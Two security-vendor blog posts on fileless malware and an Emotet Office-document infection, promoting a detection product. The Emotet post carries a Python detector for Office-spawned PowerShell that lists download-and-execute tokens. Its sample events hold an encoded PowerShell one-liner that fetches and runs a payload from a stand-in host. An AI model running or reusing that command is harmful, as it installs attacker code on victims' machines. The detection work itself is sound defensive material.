
The Rise of Fileless Malware Delivery and the Need for Better Defences

Fileless malware is a type of malicious software that is able to bypass most security measures because it does not rely on files written to disk: it resides in memory (RAM) and abuses components already present on a user’s PC, such as the Windows registry, to run and persist.

This year has seen a reported 265% increase in fileless malware threats compared to the first half of 2018. Increasingly sophisticated in its delivery and difficult to detect, fileless malware has become a major security concern for businesses across all sectors.

Preventing permanent damage to your business

With detection of fileless malware a challenging endeavour, prevention is a strong first step to reducing the risk of permanent damage to your business. This starts with proper user training.

“Fundamentally, the biggest security-related challenge is the vulnerability that sits in the chair,” said Dan Kent, Head of Technical for Fitzrovia IT, a leading IT support company in London.

“People – human error – are typically the catalyst for a PC getting a virus. That’s why end-user training is so important. You need to make sure your staff know what to look out for and how to recognise when something is not right,” he said.

In addition to end-user training, it is essential to consistently review your company’s IT security policies, taking into consideration:

  • Do you have a strong disaster recovery plan in place?
  • Is your business Cyber Essentials accredited?
  • If your company has a ‘Bring Your Own Device’ policy, do you have proper MDM and security policies in place?
  • Are you working with a dedicated IT support provider?

Keeping your systems properly patched and up to date can also prevent exploitation of vulnerabilities by fileless malware.  

“All these things matter and can make a difference, no matter how small,” said Dan. “All areas of security must be aligned in order to prevent large-scale breaches and irreversible damage.”

How Custodian360 can help

To properly combat fileless malware delivery, enhanced services and defences are needed. Solutions like Custodian360 are able to spot and stop infectious malware immediately, identifying potential behaviour-based risks in real time.

“Custodian360 have been incredibly effective at preventing fileless malware,” said Dan. “In environments with Custodian360 running alongside alternative products, Custodian360 is able to catch and quarantine issues that the other systems don’t see.”

“Custodian360 is a great example of how machine learning and artificial intelligence can provide advanced methods of threat detection, delivering full-coverage protection for your business.”

Written by the team at Fitzrovia IT, delivering trusted IT support in London for 20 years.

Emotet Returns

Emotet Trojan


Since its initial discovery in 2014, the Emotet trojan has become an increasingly dangerous and persistent threat to users and organisations across the globe. CISA, the cyber security division of the US Department of Homeland Security, refers to Emotet as ‘among the most costly and destructive malware’, affecting organisations of all sizes in both the private and public sectors.

Although Emotet started out as a way to steal users’ banking details, the scope and capabilities of this trojan have since changed drastically.

Emotet can be extremely damaging to an organisation: it spreads itself across a network to infect other machines, skims Outlook contact information for use in spear-phishing attacks, steals browser history and user credentials, and installs other malware such as backdoors and ransomware. Because Emotet is polymorphic, constantly changing and modifying itself, it is increasingly difficult to detect and prevent using typical signature-based methods, with hundreds of unique payload variants discovered daily.

Phishing Email Example

Emotet trojans will generally arrive on a user’s machine via emails like the example above: spam messages spoofing common brands and institutions (banks, government departments), with layouts and language designed to encourage the user to open the malicious attachment or click a link to a site hosting the document for download.

Crimeware-as-a-service (CaaS) helps ensure that new versions of these email attachments can be generated and distributed on a near-constant basis, so that each fresh sample evades traditional AV on the day it appears.

We regularly see new Emotet detections. One example of a malicious Emotet attachment detected by one of our agents had been created only 4 hours earlier.

VT History

Within that short span of time, a new .doc attachment had been generated with a new file hash, unknown to a traditional AV solution, attached to an email and sent to an unsuspecting user, ready for the morning inbox clear-out.

At the time of the detection, our threat researcher uploaded a copy of the threat file to VirusTotal, where only 8 other vendors had the file marked as malicious.

VT Detections

This means that on many other AV solutions the file would have been allowed to run undetected.

In this example, the user opens the attachment, unaware that the document has started delivering the Emotet payload.

From the attack storyline on our management console, we can see that as soon as the document is opened it attempts to use PowerShell to run obfuscated code. Code obfuscation is one of the methods attackers use to evade the static analysis engines in anti-virus products and to disguise their activity.

Story Line

In this case, the PowerShell code attempts to create a network connection to a compromised domain online and download the additional Emotet payload to the user’s machine for further exploitation.
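The storyline just described (an Office document spawning PowerShell with obfuscated code, which then reaches out over the network to fetch a payload) is exactly the parent/child and network behaviour a behavioural engine keys on. The following is an added example, not Custodian360’s engine and not code from the original post: a small Python correlator that runs over constructed, simplified Sysmon-style process-creation and network-connection events. The event field names, the sample command lines, the decoded PowerShell one-liner and the host name compromised-host.example are all assumptions made for the example.

```python
"""Added example: behavioural correlation of Office -> script-host -> network events.

Not Custodian360's engine. Event records are constructed, simplified Sysmon-style
dicts; field names (event, pid, image, parent_image, cmdline, dest_host, dest_port)
are assumptions for this example.
"""
import base64
import binascii
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell's -EncodedCommand switch (and its accepted abbreviations) followed by base64.
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Tokens commonly seen in download-and-execute one-liners; matched case-insensitively.
SUSPICIOUS_TOKENS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
                     "net.webclient", "frombase64string", "-nop", "-w hidden",
                     "-windowstyle hidden", "bypass")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def obfuscation_indicators(cmdline):
    """List the reasons a command line looks obfuscated or suspicious (empty if none)."""
    reasons = []
    # Strip the base64 blob before token matching so random base64 cannot match a token.
    text = ENCODED_SWITCH.sub(" ", cmdline).lower()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command (base64 UTF-16LE)")
        text += " " + decoded.lower()
    if cmdline.count("`") >= 3 or cmdline.count("^") >= 3:
        reasons.append("escape-character obfuscation")
    reasons.extend(f"token: {tok}" for tok in SUSPICIOUS_TOKENS if tok in text)
    return reasons


def analyse_events(events):
    """Correlate process-creation and network events into per-PID alerts.

    Severity: Office spawning a script host = medium; plus obfuscation indicators = high;
    plus an outbound connection from that process = critical.
    """
    alerts = {}
    for ev in events:
        if ev["event"] == "process_create":
            if (ev["parent_image"].lower() in OFFICE_APPS
                    and ev["image"].lower() in SCRIPT_HOSTS):
                reasons = [f"{ev['parent_image']} spawned {ev['image']}"]
                reasons += obfuscation_indicators(ev["cmdline"])
                severity = "high" if len(reasons) > 1 else "medium"
                alerts[ev["pid"]] = {"pid": ev["pid"], "severity": severity, "reasons": reasons}
        elif ev["event"] == "network_connect":
            alert = alerts.get(ev["pid"])
            if alert is not None:  # only escalate processes already flagged
                alert["reasons"].append(
                    f"outbound connection to {ev['dest_host']}:{ev['dest_port']}")
                alert["severity"] = "critical"
    return list(alerts.values())


# Constructed sample telemetry (not real events). The decoded one-liner is built here
# and base64-encoded exactly as PowerShell expects, so the decoder can be checked.
DECODED_SAMPLE = ("Invoke-Expression (New-Object Net.WebClient)"
                  ".DownloadString('http://compromised-host.example/stage2')")
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"event": "process_create", "pid": 4120, "image": "WINWORD.EXE",
     "parent_image": "explorer.exe", "cmdline": "WINWORD.EXE invoice.doc"},
    {"event": "process_create", "pid": 5200, "image": "powershell.exe",
     "parent_image": "WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}"},
    {"event": "network_connect", "pid": 5200, "image": "powershell.exe",
     "dest_host": "compromised-host.example", "dest_port": 80},
    {"event": "process_create", "pid": 6100, "image": "powershell.exe",
     "parent_image": "explorer.exe", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"event": "process_create", "pid": 6200, "image": "powershell.exe",
     "parent_image": "EXCEL.EXE", "cmdline": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for alert in analyse_events(SAMPLE_EVENTS):
        print(alert["pid"], alert["severity"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

Run on the sample events, the correlator flags PID 5200 as critical (Word spawned PowerShell, the command was base64-encoded, the decoded text contains download-and-execute tokens, and the process then connected out) and PID 6200 as medium (Excel spawned PowerShell with a plain command), while the administrator’s backup script launched from Explorer produces no alert. Decoding the encoded command rather than matching the raw base64 is the important design choice: the hash and the base64 blob change with every generated sample, but the behaviour they encode does not.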

For any business, such an attack could cause severe consequences that would translate to high financial costs and reputational damage.

In this case, the threat was detected by the agent’s behavioural engine, which determined that the activity exhibited by the threat was malicious and then autonomously killed and quarantined it on the user’s machine. After investigation by our security analysts, the threat was successfully remediated without any disruption or compromise to the user’s machine.

Without our agent in place on the user’s machine, the result may not have been as favourable.


Alex James – Lead Security Analyst – Custodian360